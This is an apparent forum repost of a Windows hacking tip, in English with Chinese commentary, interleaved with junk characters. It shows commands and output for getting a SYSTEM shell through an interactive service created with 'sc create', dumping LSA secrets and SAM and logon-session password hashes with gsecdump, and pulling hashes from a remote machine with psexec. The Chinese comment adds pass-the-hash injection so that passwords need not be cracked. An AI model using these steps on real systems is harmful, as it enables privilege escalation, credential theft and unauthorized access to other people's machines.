o get a DOS Prompt as NT system:) G& W0 q* ], {. [: t8 m
0 [( E2 L+ N9 y9 U2 r# V
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact& W5 ?& x( [. B4 ?
[SC] CreateService SUCCESS
: K m: Z/ p/ F$ k: i' B+ V( Z3 y) j2 X! C
C:\>sc start shellcmdline
& d& s3 e4 [$ Y0 D- Z1 L( z2 O[SC] StartService FAILED 1053:- D3 T: i! y2 w( I
0 O$ x/ ]" \ v
The service did not respond to the start or control request in a timely fashion.
% e- K0 V4 [: S E/ K* l! ?8 l" y
C:\>sc delete shellcmdline. |4 ?: g" k! y( ^. n
[SC] DeleteService SUCCESS, q1 C) K/ y1 T
, C# v3 k# d J& }+ K' t( `
------------
2 X3 C% C0 u! g& |% f# T0 R0 q, K3 H$ b: h$ I
Then in the new DOS window:
0 A' b7 O, S# p* l6 h3 ]0 Z5 X
. J& P2 Y9 y7 |" {Microsoft Windows XP [Version 5.1.2600]
' X0 c# O7 u I* \9 M5 |* ~(C) Copyright 1985-2001 Microsoft Corp." Y6 |* N8 }3 V
4 k0 Q& \, ?. }2 c. w" bC:\WINDOWS\system32>whoami z" }7 ] W. I6 X
NT AUTHORITY\SYSTEM
4 _" `2 ]% W+ U q3 V e1 Z# {/ }7 `9 @* g2 {2 _) p
C:\WINDOWS\system32>gsecdump -h: U6 r* j& {" B0 \) I
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)- A, Z$ X3 x1 q5 e2 x
usage: gsecdump [options]
% a5 T: p0 y) M! ` T1 [; h3 a3 R0 R* A
options:
( e* e: b4 M. {-h [ --help ] show help2 @ v4 H' V# X+ E: u) H0 I
-a [ --dump_all ] dump all secrets# ~% C" k. l' H$ r" J, N0 W8 b
-l [ --dump_lsa ] dump lsa secrets0 V4 f* V5 @- c* k. J
-w [ --dump_wireless ] dump microsoft wireless connections/ T% ?5 N& b R. t
-u [ --dump_usedhashes ] dump hashes from active logon sessions3 I0 V% G- D4 e+ c1 G
-s [ --dump_hashes ] dump hashes from SAM/AD
P0 L+ h1 j# {# Y3 J. I( {, ~, Q: ]( t2 S0 ^. n
Although I like to use:
2 w2 A$ s6 ?- Y" i! Q2 o
9 f2 L" \5 F7 p2 UPsExec v1.83 - Execute processes remotely
9 k( F/ B* ` ~Copyright (C) 2001-2007 Mark Russinovich
# w. b1 h* ~0 r( o" fSysinternals - 链接标记[url]www.sysinternals.com[/url]
/ {* @* a/ Z$ w m h* N3 I+ Y$ E2 W3 M- V# _
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
# R T( f* d3 V: N6 }+ u
! u8 j: N8 b! _- K' q. Vto get the hashes from active logon sessions of a remote system.( q( ?2 n2 [+ u- O" l# V( S
$ z% |3 o4 o; O$ K: a- mThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
8 B( W9 v1 p2 J9 Y% e- i/ G0 g. k. u' [2 S
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.& Q) K4 B/ q& Y0 E# j' t1 Z
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]: t( d, M9 T! j2 V7 i- a
; M( R1 Z, S6 I6 u+ G) Z2 n/ X. T
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
! q# j- B8 A5 H+ e |